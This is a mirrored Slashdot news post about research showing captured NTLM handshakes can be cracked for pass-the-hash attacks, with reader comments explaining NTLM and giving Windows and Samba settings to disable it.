Slashdot Mirror
NTLM 100% Broken Using Hashes Derived From Captures
New submitter uCallHimDrJ0NES writes "Security researcher Mark Gamache has used Moxie Marlinspike's Cloudcracker to derive hashes from captured NTLM handshakes, resulting in successful pass-the-hash attacks. It's been going on for a long time, probably, but this is the first time a 'white hat' has researched and exposed the how-to details for us all to enjoy. 'You might think that with all the papers and presentations, no one would be using NTLM...or, God forbid, LM. NTLMv2 has been around for quite some time. Surely, everyone is using it. Right? Wrong! According to the last data from the W3 Schools, 21% of computers are running XP, while NetMarketShare claims it is 39%. Unless someone has hardened these machines (no MS patches do this), these machines are sending LM and NTLM responses!' Microsoft has posted a little guidance for those who need to turn off NTLM. Have fun explaining your new security project to your management, server admins!"
NTLM stands for Windows NT Lan Manager. Is was used in earlier Windows from NT 3.1 (yes THAT old) up til Win 2K3 IIRC.
Users would authenticate their login credentials to the system. NTLM is the sub-system that does that authentication.
For more details see wikipedia: http://en.wikipedia.org/wiki/NTLM
The Microsoft article http://support.microsoft.com/kb/2793313 referenced above points to http://technet.microsoft.com/library/cc960646.aspx
You can also use Group Policy:
http://technet.microsoft.com/en-us/library/cc738867(v=ws.10).aspx
I'd say this affects Linux too - a bunch of machines with Samba are quite possibly vulnerable, and need a different settings change than what Windows does.
At a minimum, the following in the smb.conf
[global]
client ntlmv2 auth = yes
lanman auth = no
ntlm auth = no
For winbindd, a recompile might be required.